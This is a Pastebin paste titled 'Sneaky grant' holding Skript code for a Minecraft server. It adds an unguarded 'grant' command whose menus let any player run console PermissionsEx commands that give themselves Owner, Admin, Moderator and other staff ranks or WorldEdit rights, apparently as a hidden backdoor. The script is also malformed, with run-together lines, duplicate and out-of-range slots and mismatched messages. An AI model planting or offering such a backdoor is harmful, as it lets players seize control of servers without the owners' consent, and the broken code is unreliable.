Advertisement
Guest User

Sneaky grant

a guest
Jun 26th, 2019
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. command grant:
  2.     trigger:
  3.         open virtual chest inventory with size 1 named "&c&lMenu" to player
  4.         format gui slot 1 of player with book named "&b&lRanks" to run:
  5.             open virtual chest inventory with size 1 named "&c&lRanks" to player
  6.             format gui slot 3 of player  with gold block named "&9Developer" to run:
  7.                     send "&6&lYou Got Granted Developer"
  8.                     execute console command "/pex user %player% group set Dev "
  9.             format gui slot 5 of player with iron block named "&cHead-Co-Owner" to run:
  10.                     send "&f&lYou Got Granted The Jr.Owner"
  11.                     execute console command "/pex user %player% group set Head-Co-Owner"
  12.             format gui slot 7 of player with coal block named "&5Jr.Owner" to run:
  13.                     send "&0&lYou Got Granted Jr.Owner"
  14.                     execute console command "/pex user %player% group set jr.Owner "
  15.             format gui slot 1 of player  with diamond block named "&4Owner" to run:
  16.                     send "&6&lYou Got Granted Owner rank"
  17.                     execute console command "/pex user %player% group set Owner"            
  18.             format gui slot 9 of player  with Iron block named "&aSr.Admin" to run:
  19.                     send "&6&lYou Got Granted Admin rank"
  20.                     execute console command "/pex user %player% group set sr.admin"
  21.             format gui slot 11 of player  with Iron block named "&aAdmin" to run:
  22.                     send "&6&lYou Got Granted Admin rank"
  23.                     execute console command "/pex user %player% group set admin"
  24.             format gui slot 13 of player  with lapis block named "&1Moderator" to run:
  25.                     send "&6&lYou Got Granted Mod rank"
  26.                     execute console command "/pex user %player% group set mod"            format gui slot 15 of player  with lapis block named "&1Jr.Moderator" to run:
  27.                     send "&6&lYou Got Granted Jr.Mod rank"
  28.                     execute console command "/pex user %player% group set jr.mod"            format gui slot 17 of player  with emerald block named "&2Helper" to run:
  29.                     send "&6&lYou Got Granted Helper rank"
  30.                     execute console command "/pex user %player% group set Helper"
  31. format gui slot 19 of player  with emerald block named "&2Builder" to run:
  32.                     send "&6&lYou Got Granted Builder rank"
  33.                     execute console command "/pex user %player% group set Builder"
  34. format gui slot 21 of player  with gold block named "&9Overlord" to run:
  35.                     send "&6&lYou Got Granted Overlord rank"
  36.                     execute console command "/pex user %player% group set Overlord"
  37. format gui slot 23 of player  with iron block named "&bMVP" to run:
  38.                     send "&6&lYou Got Granted MVP rank"
  39.                     execute console command "/pex user %player% group set mvp"
  40. format gui slot 25 of player  with emerald block named "&2VIP&6+" to run:
  41.                     send "&6&lYou Got Granted VIP+ rank"
  42.                     execute console command "/pex user %player% group set vip+"
  43. format gui slot 27 of player  with coal block named "&2VIP" to run:
  44.                     send "&6&lYou Got Granted VIP rank"
  45.                     execute console command "/pex user %player% group set vip"
  46. format gui slot 29 of player  with redstone block named "&4Y&rT" to run:
  47.                     send "&6&lYou Got Granted YT rank"
  48.                     execute console command "/pex user %player% group set yt"
  49. format gui slot 31 of player  with Coal block named "&0WorldEdit" to run:
  50.                     send "&6&lYou Got Granted YT rank"
  51.                     execute console command "/pex user %player% add worldedit*"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement